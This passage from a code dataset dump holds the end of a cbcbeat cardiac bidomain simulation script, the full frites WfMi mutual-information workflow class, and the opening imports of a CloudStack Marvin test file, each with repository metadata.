2)\n\n\n\"\"\"\nplt.figure()\nplot(refined_mesh)\nplt.savefig('pictures/refined_mesh.png')\nplt.figure()\nplot(heart_mesh)\nplt.savefig('pictures/heart_mesh.png')\n\n\nplot(refined_mesh)\nplt.plot(12,18.3,'ro')\nplt.plot(12,0.3, 'bo')\nplt.plot(1.6,13.5, 'ro')\nplt.plot(25.8,13.5, 'bo')\nplt.savefig('pictures/surface_potential_points.png')\n\"\"\"\n\n\"\"\"\nmesh_cells = [refined_mesh.num_vertices(), refined_mesh.num_cells()]\nheart_mesh_cells = [heart_mesh.num_vertices(), heart_mesh.num_cells()]\nprint(mesh_cells)\nprint(heart_mesh_cells)\nprint(\"Compute min/max cell inradius.\", refined_mesh.rmin(), refined_mesh.rmax())\nprint(\"Compute min/max cell inradius.\", heart_mesh.rmin(), heart_mesh.rmax())\n\"\"\"\nvtkfile = File('mesh/heart_mesh_torsomesh.xml')\nvtkfile << heart_mesh\n\n\n\ndef setup_conductivities(mesh, chi, C_m):\n # Load fibers and sheets\n Vv = VectorFunctionSpace(mesh, \"DG\", 0)\n fiber = Function(Vv)\n File(\"fibers/fiber_torso.xml\") >> fiber\n plt.figure()\n plot(fiber)\n plt.savefig('pictures/fiber_direction')\n\n # Extract stored conductivity data.\n V = FunctionSpace(mesh, \"CG\", 1)\n\n info_blue(\"Using healthy conductivities\")\n g_el_field = Function(V, name=\"g_el\")\n g_et_field = Function(V, name=\"g_et\")\n g_il_field = Function(V, name=\"g_il\")\n g_it_field = Function(V, name=\"g_it\")\n\n g_el_field.vector()[:] = 2.0/(C_m*chi) #2.0/(C_m*chi)\n g_et_field.vector()[:] = 1.65/(C_m*chi) #1.65/(C_m*chi)\n g_il_field.vector()[:] = 3.0/(C_m*chi) #3.0/(C_m*chi)\n g_it_field.vector()[:] = 1.0/(C_m*chi) #1.0/(C_m*chi)\n\n # Construct conductivity tensors from directions and conductivity\n # values relative to that coordinate system\n A = as_matrix([[fiber[0]], [fiber[1]]])\n\n from ufl import diag\n M_e_star = diag(as_vector([g_el_field, g_et_field]))\n M_i_star = diag(as_vector([g_il_field, g_it_field]))\n M_e = A*M_e_star*A.T\n M_i = A*M_i_star*A.T\n\n return M_i, M_e\n\nchi = 90\nC_m = 1.0\n\nM_i, M_e = setup_conductivities(heart_mesh, chi, C_m)\nM_T = 1.0/(C_m*chi)\n\n\ncell_model = Tentusscher_panfilov_2006_epi_cell()\n#cell_model = FitzHughNagumoManual()\n\n# Define stimulus on three different areas on the torso mesh\ntime = Constant(0.0)\namplitude = 10\n\nS1_subdomain_1 = CompiledSubDomain(\"(pow(x[0] - 11.5212, 2) + pow(x[1] - 13.3015, 2)) <= pow(0.6, 2)\", degree=2)\nS1_subdomain_2 = CompiledSubDomain(\"(pow(x[0] - 9.6885, 2) + pow(x[1] - 13.5106, 2)) <= pow(0.5, 2)\", degree=2)\nS1_subdomain_3 = CompiledSubDomain(\"(pow(x[0] - 12.5245, 2) + pow(x[1] - 15.6641, 2)) <= pow(0.6, 2)\", degree=2)\n\nS1_markers = MeshFunction(\"size_t\", heart_mesh, heart_mesh.topology().dim())\n\nS1_subdomain_1.mark(S1_markers, 1)\nI_s1 = Expression(\"time >= start ? (time <= (duration + start) ? amplitude : 0.0) : 0.0\",\n time=time,\n start=0.0,\n duration=5.0,\n amplitude=amplitude,\n degree=0)\n\nS1_subdomain_2.mark(S1_markers, 2)\nI_s2 = Expression(\"time >= start ? (time <= (duration + start) ? amplitude : 0.0) : 0.0\",\n time=time,\n start=0.0,\n duration=5.0,\n amplitude=amplitude,\n degree=0)\n\nS1_subdomain_3.mark(S1_markers, 3)\nI_s3 = Expression(\"time >= start ? (time <= (duration + start) ? amplitude : 0.0) : 0.0\",\n time=time,\n start=20.0,\n duration=5.0,\n amplitude=amplitude,\n degree=0)\n\n# Store input parameters in cardiac model\nstimulus = Markerwise((I_s1,I_s2,I_s3), (1,2,3), S1_markers)\n\n# Collect this information into the CardiacModel class\ncardiac_model = CardiacModel(refined_mesh, heart_mesh, time, M_i, M_e, M_T, cell_model, stimulus)\n\n# Customize and create a splitting solver\nps = SplittingSolver.default_parameters()\nps['apply_stimulus_current_to_pde'] = True\nps[\"theta\"] = 0.5\nps[\"pde_solver\"] = \"bidomain\"\nps[\"CardiacODESolver\"][\"scheme\"] = \"RL1\" # 1st order Rush-Larsen for the ODEs\n\nsolver = SplittingSolver(cardiac_model, params=ps)\n\n# Extract the solution fields and set the initial conditions\n(vs_, vs, vur) = solver.solution_fields()\nvs_.assign(cell_model.initial_conditions())\n\n# Time stepping parameters\nN = 200\nT = 400\ndt = T/N\ninterval = (0.0, T)\n\nout_v = File(\"paraview_cbcbeat/bidomain_v.pvd\")\nout_u = File(\"paraview_cbcbeat/bidomain_u.pvd\")\n\n\ncount = 0\nu_difference = np.zeros((2,N))\nt = np.zeros(N)\naction_potential = np.zeros(N)\nplot_figures = True\nplotting_time = [25.0, 75.0, 220.0, 290.0, 360.0]\nfor (timestep, fields) in solver.solve(interval, dt):\n print(\"(t_0, t_1) = (%g, %g)\", timestep)\n # Extract the components of the field (vs_ at previous timestep,\n # current vs, current vur)\n (vs_, vs, vur) = fields\n\n\n action_potential[count] = vur.sub(0)(12,14)\n t[count] = timestep[1]\n u_difference[0][count] = vur.sub(1)(10,19) - vur.sub(1)(10,0.3)\n u_difference[1][count] = vur.sub(1)(1.6,10) - vur.sub(1)(25.8,10)\n\n count += 1\n out_v << vur.sub(0)\n out_u << vur.sub(1)\n\n if plot_figures == True:\n for time in plotting_time:\n if timestep[0] == time:\n print('PLOTTING FIGURE')\n plt.figure()\n c = plot(vur.sub(0), title=\"v at time=%d ms\" %(time), mode='color', vmin=-100, vmax=50)\n c.set_cmap(\"jet\")\n plt.colorbar(c, fraction=0.043, pad=0.009)\n plt.savefig(\"plots_cbcbeat/torsomesh_v_%d.png\" %(time))\n plt.figure()\n c = plot(vur.sub(1), title=\"u_e at time=%d ms\" %(time), mode='color', vmin=-10, vmax=10)\n c.set_cmap(\"jet\")\n plt.colorbar(c, fraction=0.034, pad=0.009)\n plt.savefig(\"plots_cbcbeat/torsomesh_u_e_%d.png\" %(time))\n\n\nnp.save(\"u_difference.npy\", u_difference)\nnp.save(\"action_potential\", action_potential)\nnp.save(\"t\", t)\n\ndef plot_ECG():\n plt.figure()\n plt.plot(t, u_difference[0], \"m\", label=\"top-to-bottom\")\n plt.plot(t, u_difference[1], \"k\", label=\"left-to-right\")\n plt.xlabel(\"ms\")\n plt.ylabel(\"mV\")\n plt.title(\"Surface potential difference\")\n plt.legend()\n plt.savefig(\"plots_cbcbeat/surface_potential.png\")\n\n\n\nplot_ECG()\n","repo_name":"abinayasak/Masterproject","sub_path":"cbcbeat_torsomesh_2.0.py","file_name":"cbcbeat_torsomesh_2.0.py","file_ext":"py","file_size_in_byte":7836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72332827291","text":"\"\"\"Workflow for computing MI and evaluate statistics.\"\"\"\nfrom copy import deepcopy\n\nimport numpy as np\nimport xarray as xr\n\nfrom mne.utils import ProgressBar\n\nfrom frites.io import set_log_level, logger\nfrom frites.workflow.wf_stats import WfStats\nfrom frites.workflow.wf_base import WfBase\nfrom frites.estimator import GCMIEstimator, ResamplingEstimator\nfrom frites.utils import parallel_func, kernel_smoothing\nfrom frites.stats import (dist_to_ci, permute_mi_vector, bootstrap_partitions,\n confidence_interval)\n\n\nclass WfMi(WfBase):\n \"\"\"Workflow of local mutual-information and statistics.\n\n This class allows to define a workflow for computing the mutual information\n and then to evaluate the significance using non-parametric statistics\n (either within-subjects or between subjects).\n\n Parameters\n ----------\n mi_type : {'cc', 'cd', 'ccd'}\n The type of mutual information that is going to be performed. Use\n either :\n\n * 'cc' : mutual information between two continuous variables\n * 'cd' : mutual information between a continuous and a discret\n variables\n * 'ccd' : mutual information between two continuous variables\n conditioned by a third discret one\n inference : {\"ffx\", \"rfx\"}\n Statistical inferences that is desired. Use either :\n\n * 'ffx' : fixed-effect to make inferences only for the population\n that have been used\n * 'rfx' : random-effect to generalize inferences to a random\n population.\n\n By default, the workflow uses group level inference ('rfx')\n estimator : MIEstimator | None\n Estimator of mutual-information. If None, the Gaussian-Copula is used\n instead.\n kernel : array_like | None\n Kernel for smoothing true and permuted MI. For example, use\n np.hanning(3) for a 3 time points smoothing or np.ones((3)) for a\n moving average\n\n References\n ----------\n Friston et al., 1996, 1999 :cite:`friston1996detecting,friston1999many`\n \"\"\"\n\n def __init__(self, mi_type='cc', inference='rfx', estimator=None,\n kernel=None, verbose=None):\n \"\"\"Init.\"\"\"\n WfBase.__init__(self)\n assert mi_type in ['cc', 'cd', 'ccd'], (\n \"'mi_type' input parameter should either be 'cc', 'cd', 'ccd'\")\n assert inference in ['ffx', 'rfx'], (\n \"'inference' input parameter should either be 'ffx' or 'rfx'\")\n self._mi_type = mi_type\n self._inference = inference\n if estimator is None:\n estimator = GCMIEstimator(mi_type=mi_type, copnorm=False,\n verbose=verbose)\n elif isinstance(estimator, ResamplingEstimator):\n raise NotImplementedError(\"Resampling estimators are not supported\"\n \" in WfMi\")\n assert estimator.settings['mi_type'] == self._mi_type\n self.estimator = estimator\n self._copnorm = isinstance(estimator, GCMIEstimator)\n self._gcrn = inference == 'rfx'\n self._kernel = kernel\n set_log_level(verbose)\n self.clean()\n self._wf_stats = WfStats(verbose=verbose)\n # update internal config\n self.attrs.update(dict(\n mi_type=mi_type, inference=inference, kernel=kernel))\n\n logger.info(\n f\"Workflow for computing mutual information (inference={inference}\"\n f\", mi_type={mi_type}, copnorm={self._copnorm})\")\n\n def _node_compute_mi(self, dataset, n_perm, n_jobs, random_state):\n \"\"\"Compute mi and permuted mi.\n\n Permutations are performed by randomizing the regressor variable. For\n the fixed effect, this randomization is performed across subjects. For\n the random effect, the randomization is performed per subject.\n \"\"\"\n # get the function for computing mi\n mi_fun = self.estimator.get_function()\n # get x, y, z and subject names per roi\n if dataset._mi_type != self._mi_type:\n assert TypeError(f\"Your dataset doesn't allow to compute the mi \"\n f\"{self._mi_type}. Allowed mi is \"\n f\"{dataset._mi_type}\")\n # get data variables\n n_roi = len(self._roi)\n # evaluate true mi\n logger.info(f\" Evaluate true and permuted mi (n_perm={n_perm}, \"\n f\"n_jobs={n_jobs})\")\n # parallel function for computing permutations\n parallel, p_fun = parallel_func(mi_fun, n_jobs=n_jobs, verbose=False)\n pbar = ProgressBar(range(n_roi), mesg='Estimating MI')\n # evaluate permuted mi\n mi, mi_p = [], []\n for r in range(n_roi):\n # get the data of selected roi\n da = dataset.get_roi_data(\n self._roi[r], copnorm=self._copnorm, mi_type=self._mi_type,\n gcrn_per_suj=self._gcrn)\n x, y, suj = da.data, da['y'].data, da['subject'].data\n kw_mi = dict()\n # cmi and categorical MI\n if 'z' in list(da.coords):\n kw_mi['z'] = da['z'].data\n if self._inference == 'rfx':\n kw_mi['categories'] = suj\n\n # compute the true mi\n _mi = mi_fun(x, y, **kw_mi)\n # get the randomize version of y\n y_p = permute_mi_vector(\n y, suj, mi_type=self._mi_type, inference=self._inference,\n n_perm=n_perm, random_state=random_state)\n # run permutations using the randomize regressor\n _mi_p = parallel(p_fun(x, y_p[p], **kw_mi) for p in range(n_perm))\n _mi_p = np.asarray(_mi_p)\n\n # kernel smoothing\n if isinstance(self._kernel, np.ndarray):\n _mi = kernel_smoothing(_mi, self._kernel, axis=-1)\n _mi_p = kernel_smoothing(_mi_p, self._kernel, axis=-1)\n\n mi += [_mi]\n mi_p += [_mi_p]\n pbar.update_with_increment_value(1)\n\n self._mi, self._mi_p = mi, mi_p\n\n return mi, mi_p\n\n def fit(self, dataset=None, mcp='cluster', n_perm=1000, cluster_th=None,\n cluster_alpha=0.05, n_jobs=-1, random_state=None, **kw_stats):\n \"\"\"Run the workflow on a dataset.\n\n In order to run the worflow, you must first provide a dataset instance\n (see :class:`frites.dataset.DatasetEphy`)\n\n .. warning::\n\n When performing statistics at the cluster-level, we only test\n the cluster size. This means that in your results, you can only\n discuss about the presence of a significant cluster without being\n precise about its spatio-temporal properties\n (see :cite:`sassenhagen2019cluster`)\n\n Parameters\n ----------\n dataset : :class:`frites.dataset.DatasetEphy`\n A dataset instance. If the workflow has already been fitted, then\n this parameter can remains to None.\n mcp : {'cluster', 'maxstat', 'fdr', 'bonferroni', 'nostat', None}\n Method to use for correcting p-values for the multiple comparison\n problem. Use either :\n\n * 'cluster' : cluster-based statistics [default]\n * 'maxstat' : test-wise maximum statistics correction\n * 'fdr' : test-wise FDR correction\n * 'bonferroni' : test-wise Bonferroni correction\n * 'nostat' : permutations are computed but no statistics are\n performed\n * 'noperm' / None : no permutations are computed\n n_perm : int | 1000\n Number of permutations to perform in order to estimate the random\n distribution of mi that can be obtained by chance\n cluster_th : str, float | None\n The threshold to use for forming clusters. Use either :\n\n * a float that is going to act as a threshold\n * None and the threshold is automatically going to be inferred\n using the distribution of permutations\n * 'tfce' : for Threshold Free Cluster Enhancement\n cluster_alpha : float | 0.05\n Control the percentile to use for forming the clusters. By default\n the 95th percentile of the permutations is used.\n n_jobs : int | -1\n Number of jobs to use for parallel computing (use -1 to use all\n jobs)\n random_state : int | None\n Fix the random state of the machine (use it for reproducibility).\n If None, a random state is randomly assigned.\n kw_stats : dict | {}\n Additional arguments are sent to\n :py:class:`frites.workflow.WfStats.fit`\n\n Returns\n -------\n mi, pvalues : array_like\n DataArray of mutual information and p-values both of shapes\n (n_times, n_roi). If `inference` is 'ffx' the mi represents the MI\n computed across subjects while if it is 'rfx' it's the mean across\n subjects.\n\n References\n ----------\n Maris and Oostenveld, 2007 :cite:`maris2007nonparametric`\n \"\"\"\n # ---------------------------------------------------------------------\n # compute mutual information\n # ---------------------------------------------------------------------\n # if mi and mi_p have already been computed, reuse it instead\n if len(self._mi) and len(self._mi_p):\n logger.info(\" True and permuted mutual-information already \"\n \"computed. Use WfMi.clean to reset \"\n \"arguments\")\n mi, mi_p = self._mi, self._mi_p\n else:\n # don't compute permutations if mcp is either nostat / None\n if mcp in ['noperm', None]:\n n_perm = 0\n\n # get needed dataset's informations\n self._times, self._roi = dataset.times, dataset.roi_names\n self._mi_dims = dataset._mi_dims\n self._mi_coords = dict()\n for k in self._mi_dims:\n if k != 'roi':\n self._mi_coords[k] = dataset.x[0].coords[k].data\n else:\n self._mi_coords['roi'] = self._roi\n self._df_rs, self._n_subjects = dataset.df_rs, dataset._n_subjects\n\n # compute mi and permutations\n mi, mi_p = self._node_compute_mi(\n dataset, n_perm, n_jobs, random_state)\n \"\"\"\n For information transfer (e.g FIT) we only need to compute the true and\n permuted mi but then, the statistics at the local representation mcp\n are discarded in favor of statistics on the information transfer\n \"\"\"\n if mcp == 'nostat':\n logger.debug(\"Permutations computed. Stop there\")\n return None\n\n # ---------------------------------------------------------------------\n # compute statistics\n # ---------------------------------------------------------------------\n # get additional stat arguments\n kw_stats['tail'] = kw_stats.get('tail', 1)\n # infer p-values and t-values\n pvalues, tvalues = self._wf_stats.fit(\n mi, mi_p, cluster_th=cluster_th, inference=self._inference,\n mcp=mcp, cluster_alpha=cluster_alpha, **kw_stats)\n # update attributes\n self.attrs.update(self._wf_stats.attrs)\n self.attrs.update(dict(n_perm=n_perm, random_state=random_state))\n\n # ---------------------------------------------------------------------\n # postprocessing and conversions\n # ---------------------------------------------------------------------\n # tvalues conversion\n if isinstance(tvalues, np.ndarray):\n self._tvalues = self._xr_conversion(tvalues, 'tvalues')\n # mean mi across subjects\n if self._inference == 'rfx':\n logger.info(\" Mean mi across subjects\")\n mi = [k.mean(axis=0, keepdims=True) for k in mi]\n mi = np.moveaxis(np.concatenate(mi, axis=0), 0, -1)\n # dataarray conversion\n mi = self._xr_conversion(mi, 'mi')\n pv = self._xr_conversion(pvalues, 'pvalues')\n\n return mi, pv\n\n def _xr_conversion(self, x, name):\n \"\"\"Xarray conversion.\"\"\"\n # build dimension order\n dims = ['times', 'roi']\n supp_dim = [k for k in self._mi_dims if k not in dims]\n dims = supp_dim + dims\n # build coordinates\n coords = [self._mi_coords[k] for k in dims]\n # build xarray\n da = xr.DataArray(x, dims=dims, coords=coords)\n # wrap with workflow's attributes\n da = self.attrs.wrap_xr(da, name=name)\n return da\n\n def conjunction_analysis(self, p=.05, mcp='cluster', cluster_th=None,\n cluster_alpha=0.05):\n \"\"\"Perform a conjunction analysis.\n\n This method can be used in order to determine the number of subjects\n that present a significant effect at a given significiency threshold.\n Note that in order to work, the workflow of mutual information must\n have already been launched using the\n :py:class:`frites.workflow.WfMi.fit`.\n\n\n .. warning::\n\n In order to work this method require that the workflow has been\n defined with `inference='rfx'` so that MI are computed per subject\n\n Parameters\n ----------\n p : float | 0.05\n Significiency threshold to find significant effect per subject.\n kwargs : dict | {}\n Optional arguments are the same as\n :py:class:`frites.workflow.WfMi.fit` method.\n\n Returns\n -------\n conj_ss : array_like\n DataArray of shape (n_subjects, n_times, n_roi) describing where\n each subject have significant MI\n conj : array_like\n DataArray of shape (n_times, n_roi) describing the number of\n subjects that have a significant MI\n \"\"\"\n # input checking\n assert self._inference == 'rfx', (\n \"Conjunction analysis are only possible when the MI has been \"\n \"computed per subject (inference='rfx')\")\n assert len(self._mi) and len(self._mi_p), (\n \"You've to lauched the workflow (`fit()`) before being able to \"\n \"perform the conjunction analysis.\")\n\n # retrieve the original number of subjects\n pv_s = {}\n for s in range(self._n_subjects):\n # reconstruct the mi and mi_p of each subject\n mi_s, mi_ps, roi_s = [], [], []\n for n_r, r in enumerate(self._roi):\n suj_roi_u = np.array(self._df_rs.loc[r, 'subjects'])\n if s not in suj_roi_u: continue # noqa\n is_suj = suj_roi_u == s\n mi_s += [self._mi[n_r][is_suj, :]]\n mi_ps += [self._mi_p[n_r][:, is_suj, :]]\n roi_s += [self._roi[n_r]]\n\n # perform the statistics\n _pv_s = self._wf_stats.fit(\n mi_s, mi_ps, mcp=mcp, cluster_th=cluster_th, tail=1,\n cluster_alpha=cluster_alpha, inference='ffx')[0]\n # dataarray conversion\n pv_s[s] = xr.DataArray(_pv_s < p, dims=('times', 'roi'),\n coords=(self._times, roi_s))\n # cross-subjects conjunction\n conj_ss = xr.Dataset(pv_s).to_array('subject')\n conj_ss.name = 'Single subject conjunction'\n conj = conj_ss.sum('subject')\n conj.name = 'Across subjects conjunction'\n # add attributes to the dataarray\n attrs = dict(p=p, cluster_th=cluster_th, cluster_alpha=cluster_alpha,\n mcp=mcp)\n for k, v in attrs.items():\n v = 'none' if v is None else v\n conj[k], conj_ss[k] = v, v\n\n return conj_ss, conj\n\n def confidence_interval(self, dataset, ci=95, n_boots=200, rfx_es='mi',\n n_jobs=-1, random_state=None, verbose=None):\n \"\"\"Estimate the empirical confidence interval.\n\n Parameters\n ----------\n dataset : :class:`frites.dataset.DatasetEphy`\n A dataset instance. If the workflow has already been fitted, then\n this parameter can remains to None.\n ci : float, list | 95\n Confidence level to use in percentage. Use either a single float\n (e.g. 95, 99 etc.) or a list of floats (e.g. [95, 99])\n n_boots : int | 200\n Number of resampling to perform\n rfx_es : {'mi', 'tvalues'}\n For the RFX model, specify whether the confidence interval has to\n be estimated on a measure of effect size in bits ('mi') or on\n second-level t-test ('tvalues')\n n_jobs : int | -1\n Number of jobs to use for parallel computing (use -1 to use all\n jobs)\n random_state : int | None\n Fix the random state of the machine (use it for reproducibility).\n If None, a random state is randomly assigned.\n\n Returns\n -------\n ci : xr.DataArray\n Confidence interval array of shape (n_ci, 2, n_times, n_roi) where\n n_ci describe the number of confidence levels define with the\n input parameter `ci`, and 2 represents the lower and upper bounds\n of the confidence interval\n \"\"\"\n set_log_level(verbose)\n\n # check inputs\n if isinstance(ci, (int, float)):\n ci = [ci]\n assert isinstance(ci, (list, tuple, np.ndarray))\n assert isinstance(n_boots, int)\n for k in ci:\n assert isinstance(k, (int, float)) and (0 < k < 100)\n assert len(self._mi) and len(self._mi_p), (\n \"You've to lauched the workflow (`fit()`) before being able to \"\n \"perform the conjunction analysis.\")\n assert rfx_es in ['mi', 'tvalues']\n\n logger.info(\"Estimation of the empirical confidence interval \"\n f\"(levels={ci}; n_boots={n_boots}\")\n\n \"\"\"\n For the RFX, the CI on t-values is estimated at the second level i.e.\n by bootstraping the subjects. I'm not sure why, but CI at the trial\n level (i.e. resampling trials per subjects) leads to t-values bellow\n the real effect size.\n \"\"\"\n if (self._inference == 'rfx') and (rfx_es == 'tvalues'):\n from frites.stats import ttest_1samp\n\n logger.info(\" Resampling at the second level t-test\")\n\n # get whether the same partition should be used across roi or not\n n_suj_roi = np.array([k.shape[0] for k in self.mi])\n part_fix = np.all(n_suj_roi == n_suj_roi[0])\n\n # create the resampling partitions for each roi (seeg)\n if part_fix: # fix partitions\n partitions = bootstrap_partitions(\n max(n_suj_roi), n_partitions=n_boots,\n random_state=random_state)\n else: # flexible partitions\n partitions = []\n for k in range(len(self.mi)):\n _part = bootstrap_partitions(\n self.mi[k].shape[0], n_partitions=n_boots,\n random_state=random_state)\n partitions.append(_part)\n\n # create the progress bar\n pbar = ProgressBar(range(n_boots), mesg='Estimating CI')\n\n # get t-test related variables\n s_hat = self._wf_stats.attrs['ttest_sigma']\n\n tt = []\n for n_p in range(n_boots):\n # resample the mi\n mi_rsh, mi_p_rsh, n_elements = [], 0., 0.\n for n_r, (mi, mi_p) in enumerate(zip(self.mi, self.mi_p)):\n # get the partition\n p = partitions[n_p] if part_fix else partitions[n_r][n_p]\n # reshape mi and mi_p\n mi_rsh.append(mi[p, :])\n _mi_p_rsh = mi_p[:, p, :]\n mi_p_rsh += _mi_p_rsh.sum()\n n_elements += np.prod(_mi_p_rsh.shape)\n\n # computes pop_mean on resampled t-values\n pop_mean = mi_p_rsh / n_elements\n\n # compute the t-test on this partition\n mi_var = max([np.var(k, axis=0, ddof=1).max() for k in mi_rsh])\n sigma = s_hat * mi_var\n _tt = np.stack([ttest_1samp(\n k, pop_mean, axis=0, implementation='mne',\n method='absolute', sigma=sigma) for k in mi_rsh], axis=0)\n tt.append(_tt)\n\n pbar.update_with_increment_value(1)\n\n # compute ci\n tt = np.stack(tt, axis=0)\n ci_all = [dist_to_ci(tt[:, [r], :], cis=ci) for r in range(\n tt.shape[1])]\n ci_all = np.stack(ci_all, axis=-1)\n\n # xarray formatting\n x_ci = xr.DataArray(\n ci_all, dims=('ci', 'bound', 'times', 'roi'),\n coords=(ci, ['low', 'high'], self._mi_coords['times'],\n self._mi_coords['roi']))\n return x_ci\n\n logger.info(\" Resampling at the first level\")\n\n \"\"\"\n For the FFX / RFX + rfx_es = 'mi', the resampling is performed at the\n single trial level.\n \"\"\"\n\n # get the function for computing mi\n mi_fun = self.estimator.get_function()\n n_roi = len(self._roi)\n if self._inference == 'rfx':\n pop_mean = self.attrs['ttest_pop_mean']\n else:\n pop_mean = None\n\n # get x, y, z and subject names per roi\n if dataset._mi_type != self._mi_type:\n assert TypeError(f\"Your dataset doesn't allow to compute the mi \"\n f\"{self._mi_type}. Allowed mi is \"\n f\"{dataset._mi_type}\")\n\n # evaluate true mi\n logger.info(f\" Evaluate the confidence interval (ci={ci}%, \"\n f\"n_boots={n_boots}, n_jobs={n_jobs})\")\n\n # define the bootstraping function\n def boot_fcn(x, y, part, **kw_mi):\n # resample the subject labels and z variable (cmi)\n kw = {k: v[part] for k, v in kw_mi.items()}\n\n return mi_fun(x[..., part], y[part], **kw)\n\n # parallel function for computing bootstrap\n parallel, p_fun = parallel_func(boot_fcn, n_jobs=n_jobs, verbose=False)\n pbar = ProgressBar(range(n_roi), mesg='Estimating CI')\n\n # evaluate permuted mi\n x_ci = []\n for r in range(n_roi):\n # get the data of selected roi\n da = dataset.get_roi_data(\n self._roi[r], copnorm=self._copnorm, mi_type=self._mi_type,\n gcrn_per_suj=self._gcrn)\n x, y, suj = da.data, da['y'].data, da['subject'].data\n kw_mi = dict()\n\n # cmi and categorical MI\n if 'z' in list(da.coords):\n kw_mi['z'] = da['z'].data\n if self._inference == 'rfx':\n kw_mi['categories'] = suj\n\n # build the group variable\n groups = tuple(v for v in kw_mi.values())\n\n # define the bootstrap partitions\n partitions = bootstrap_partitions(\n len(y), *groups, n_partitions=n_boots,\n random_state=random_state)\n\n # compute the true mi\n _mi_b = parallel(p_fun(\n x, y, p, **kw_mi) for p in partitions)\n\n # compute ci\n _x_ci = dist_to_ci(\n np.asarray(_mi_b), cis=ci, inference=self._inference,\n pop_mean=pop_mean, rfx_es='mi'\n )\n x_ci.append(_x_ci)\n pbar.update_with_increment_value(1)\n x_ci = np.stack(x_ci, axis=-1)\n\n # xarray conversion\n x_ci = xr.DataArray(\n x_ci, dims=('ci', 'bound', 'times', 'roi'),\n coords=(ci, ['low', 'high'], self._mi_coords['times'],\n self._mi_coords['roi']))\n\n return x_ci\n\n def get_params(self, *params, cis=95, n_boots=200, random_state=None):\n \"\"\"Get formatted parameters.\n\n This method can be used to get internal arrays formatted as xarray\n DataArray.\n\n Parameters\n ----------\n params : string\n Internal array names to get as xarray DataArray. You can use :\n\n * 'tvalues' : DataArray of t-values of shape (n_times, n_roi).\n Only possible with RFX inferences\n * 'mi_ss' : DataArray of single subject mutual-information of\n shape (n_subjects, n_times, n_roi)\n * 'perm_ss' : DataArray of computed permutations of shape\n (n_perm, n_subjects, n_times, n_roi)\n * 'perm_' : DataArray of maximum computed permutations of\n shape (n_perm,)\n * 'mi_ci' : DataArray of confidence interval computed when\n taking the mean of MI across subjects (or sessions). The\n output shape is (n_ci, 2, n_times, n_roi) where\n n_ci describe the number of confidence levels define with the\n input parameter `ci`, and 2 represents the lower and upper\n bounds of the confidence interval\n\n ci : float, list | 95\n Confidence level to use in percentage. Use either a single float\n (e.g. 95, 99 etc.) or a list of floats (e.g. [95, 99])\n n_boots : int | 200\n Number of resampling to perform\n random_state : int | None\n Fix the random state of the machine (use it for reproducibility).\n If None, a random state is randomly assigned.\n\n \"\"\"\n # input checking\n if isinstance(cis, (int, float)): cis = [cis] # noqa\n assert isinstance(cis, (list, tuple, np.ndarray))\n assert isinstance(n_boots, int)\n # get coordinates\n times, roi, df_rs = self._times, self._roi, self._df_rs\n if self._inference == 'ffx':\n suj = [np.array([-1])] * len(roi)\n elif self._inference == 'rfx':\n suj = [np.array(df_rs.loc[r, 'subjects']) for r in roi]\n n_perm = self._mi_p[0].shape[0]\n perm = np.arange(n_perm)\n # loop over possible outputs\n outs = []\n for param in params:\n assert isinstance(param, str)\n logger.info(f' Formatting array {param}')\n if param == 'tvalues':\n da = self._tvalues\n elif param == 'mi_ss':\n mi = dict()\n for n_r, r in enumerate(roi):\n mi[r] = xr.DataArray(\n self._mi[n_r], coords=(suj[n_r], times),\n dims=('subject', 'times'))\n da = xr.Dataset(mi).to_array('roi')\n da = da.transpose('subject', 'times', 'roi')\n elif param == 'mi_ci':\n mi_ci = {}\n for n_r, r in enumerate(roi):\n # compute ci\n _ci = confidence_interval(\n self._mi[n_r], axis=0, cis=cis, n_boots=n_boots,\n random_state=random_state)\n\n # xarray\n mi_ci[r] = xr.DataArray(\n _ci, dims=('ci', 'bound', 'times'),\n coords=(cis, ['low', 'high'], times))\n\n da = xr.Dataset(mi_ci).to_array('roi').transpose(\n 'ci', 'bound', 'times', 'roi'\n )\n\n elif param == 'perm_ss':\n mi = dict()\n for n_r, r in enumerate(roi):\n mi[r] = xr.DataArray(\n self._mi_p[n_r], dims=('perm', 'subject', 'times'),\n coords=(perm, suj[n_r], times))\n da = xr.Dataset(mi).to_array('roi')\n da = da.transpose('perm', 'subject', 'times', 'roi')\n elif param == 'perm_':\n mi_p = np.r_[tuple([k.ravel() for k in self._mi_p])]\n mi_p.sort()\n da = xr.DataArray(mi_p[-n_perm:], dims=('perm',),\n coords=(perm,))\n else:\n raise ValueError(f\"Parameter {param} not found\")\n # add workflow attributes\n self.attrs.wrap_xr(da, name=param)\n outs += [da]\n\n # fix returning single output\n if len(outs) == 1:\n return outs[0]\n else:\n return tuple(outs)\n\n def clean(self):\n \"\"\"Clean computations.\"\"\"\n self._mi, self._mi_p, self._tvalues = [], [], None\n\n def copy(self):\n \"\"\"Return copy of WfMi instance.\n\n Returns\n -------\n epochs : instance of WfMi\n A copy of the object.\n \"\"\"\n return deepcopy(self)\n\n def __deepcopy__(self, memodict):\n \"\"\"Make a deepcopy.\"\"\"\n cls = self.__class__\n result = cls.__new__(cls)\n for k, v in self.__dict__.items():\n # drop_log is immutable and _raw is private (and problematic to\n # deepcopy)\n if k in ('drop_log', '_raw', '_times_readonly'):\n memodict[id(v)] = v\n else:\n v = deepcopy(v, memodict)\n result.__dict__[k] = v\n return result\n\n @property\n def mi(self):\n \"\"\"List of length (n_roi) of true mutual information. Each element of\n this list has a shape of (n_subjects, n_times) if `inference` is 'rfx'\n (1, n_times) if `inference` is 'ffx'.\"\"\"\n return self._mi\n\n @property\n def mi_p(self):\n \"\"\"List of length (n_roi) of permuted mutual information. Each element\n of this list has a shape of (n_perm, n_subjects, n_times) if\n `inference` is 'rfx' (n_perm, 1, n_times) if `inference` is 'ffx'.\"\"\"\n return self._mi_p\n\n @property\n def tvalues(self):\n \"\"\"T-values array of shape (n_times, n_roi) when group level analysis\n is selected.\"\"\"\n return self._tvalues\n\n @property\n def wf_stats(self):\n \"\"\"Get the workflow of statistics.\"\"\"\n return self._wf_stats\n","repo_name":"brainets/frites","sub_path":"frites/workflow/wf_mi.py","file_name":"wf_mi.py","file_ext":"py","file_size_in_byte":30229,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"32"} +{"seq_id":"33779164675","text":"from nose.plugins.attrib import attr\nfrom marvin.cloudstackTestCase import cloudstackTestCase\nfrom marvin.lib.utils import (cleanup_resources)\nfrom marvin.lib.base import (Account,\n 